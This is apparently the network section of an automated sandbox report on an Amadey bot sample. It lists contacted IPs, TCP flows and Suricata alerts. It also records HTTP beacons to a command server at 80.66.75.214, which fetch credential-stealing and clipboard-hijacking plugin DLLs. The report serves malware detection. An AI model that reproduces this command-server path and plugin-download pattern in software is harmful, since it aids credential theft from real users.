Network Analysis
IP Address | Status | Action |
---|---|---|
110.42.3.95 | Active | Moloch |
116.202.81.93 | Active | Moloch |
118.25.101.87 | Active | Moloch |
119.176.96.94 | Active | Moloch |
125.229.77.252 | Active | Moloch |
146.148.25.153 | Active | Moloch |
155.159.241.238 | Active | Moloch |
157.97.109.159 | Active | Moloch |
162.0.211.158 | Active | Moloch |
162.240.68.86 | Active | Moloch |
178.17.168.102 | Active | Moloch |
182.92.155.50 | Active | Moloch |
184.154.46.96 | Active | Moloch |
80.66.75.214 | Active | Moloch |
197.234.223.180 | Active | Moloch |
213.100.160.101 | Active | Moloch |
213.199.32.146 | Active | Moloch |
34.43.67.154 | Active | Moloch |
37.16.7.184 | Active | Moloch |
38.249.14.69 | Active | Moloch |
38.249.8.144 | Active | Moloch |
47.99.144.17 | Active | Moloch |
63.134.234.92 | Active | Moloch |
68.183.179.133 | Active | Moloch |
77.246.158.216 | Active | Moloch |
79.124.17.242 | Active | Moloch |
79.96.222.94 | Active | Moloch |
83.243.47.17 | Active | Moloch |
87.230.85.251 | Active | Moloch |
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. | | |
TCP Requests
- 116.202.81.93:21 192.168.56.103:57877
- 118.25.101.87:21 192.168.56.103:57924
- 118.25.101.87:2121 192.168.56.103:57956
- 119.176.96.94:21 192.168.56.103:57960
- 125.229.77.252:21 192.168.56.103:57848
- 146.148.25.153:21 192.168.56.103:57345
- 162.0.211.158:21 192.168.56.103:57855
- 162.240.68.86:21 192.168.56.103:57593
- 178.17.168.102:21 192.168.56.103:57551
- 182.92.155.50:21 192.168.56.103:57957
- 184.154.46.96:21 192.168.56.103:57365
- 192.168.56.103:49165 80.66.75.214:80
- 192.168.56.103:49166 80.66.75.214:80
- 192.168.56.103:49172 80.66.75.214:80
- 192.168.56.103:49175 80.66.75.214:80
- 197.234.223.180:21 192.168.56.103:57846
- 213.100.160.101:21 192.168.56.103:57775
- 213.199.32.146:21 192.168.56.103:57871
- 68.183.179.133:21 192.168.56.103:57369
- 77.246.158.216:21 192.168.56.103:57894
- 79.124.17.242:21 192.168.56.103:57869
- 83.243.47.17:21 192.168.56.103:57886
- 87.230.85.251:21 192.168.56.103:57874
HTTP Requests

POST 200 http://80.66.75.214/g8djmsaxA/index.php

Request:
POST /g8djmsaxA/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 80.66.75.214
Content-Length: 4
Cache-Control: no-cache

Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 07 Aug 2024 00:59:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

POST 200 http://80.66.75.214/g8djmsaxA/index.php?scr=1

Request:
POST /g8djmsaxA/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----ODcwMTk=
Host: 80.66.75.214
Content-Length: 87171
Cache-Control: no-cache

Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 07 Aug 2024 00:59:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

POST 200 http://80.66.75.214/g8djmsaxA/index.php

Request:
POST /g8djmsaxA/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 80.66.75.214
Content-Length: 160
Cache-Control: no-cache

Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 07 Aug 2024 00:59:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

GET 200 http://80.66.75.214/g8djmsaxA/Plugins/cred64.dll

Request:
GET /g8djmsaxA/Plugins/cred64.dll HTTP/1.1
Host: 80.66.75.214

Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 07 Aug 2024 00:59:34 GMT
Content-Type: application/octet-stream
Content-Length: 1257472
Last-Modified: Mon, 11 Dec 2023 09:14:12 GMT
Connection: keep-alive
ETag: "6576d2e4-133000"
Accept-Ranges: bytes

POST 200 http://80.66.75.214/g8djmsaxA/index.php

Request:
POST /g8djmsaxA/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 80.66.75.214
Content-Length: 21
Cache-Control: no-cache

Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 07 Aug 2024 00:59:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php

GET 200 http://80.66.75.214/g8djmsaxA/Plugins/clip64.dll

Request:
GET /g8djmsaxA/Plugins/clip64.dll HTTP/1.1
Host: 80.66.75.214

Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 07 Aug 2024 00:59:47 GMT
Content-Type: application/octet-stream
Content-Length: 104448
Last-Modified: Mon, 11 Dec 2023 09:14:14 GMT
Connection: keep-alive
ETag: "6576d2e6-19800"
Accept-Ranges: bytes

POST 200 http://80.66.75.214/g8djmsaxA/index.php

Request:
POST /g8djmsaxA/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 80.66.75.214
Content-Length: 5
Cache-Control: no-cache

Response:
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 07 Aug 2024 00:59:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 155.159.241.238:21 -> 192.168.56.103:57971 | 2400024 | ET DROP Spamhaus DROP Listed Traffic Inbound group 25 | Misc Attack |
TCP 192.168.56.103:49166 -> 80.66.75.214:80 | 2044597 | ET MALWARE Amadey Bot Activity (POST) M1 | A Network Trojan was detected |
TCP 192.168.56.103:49166 -> 80.66.75.214:80 | 2027250 | ET INFO Dotted Quad Host DLL Request | Potentially Bad Traffic |
TCP 80.66.75.214:80 -> 192.168.56.103:49166 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
TCP 80.66.75.214:80 -> 192.168.56.103:49166 | 2016538 | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | Potentially Bad Traffic |
TCP 192.168.56.103:49166 -> 80.66.75.214:80 | 2027250 | ET INFO Dotted Quad Host DLL Request | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts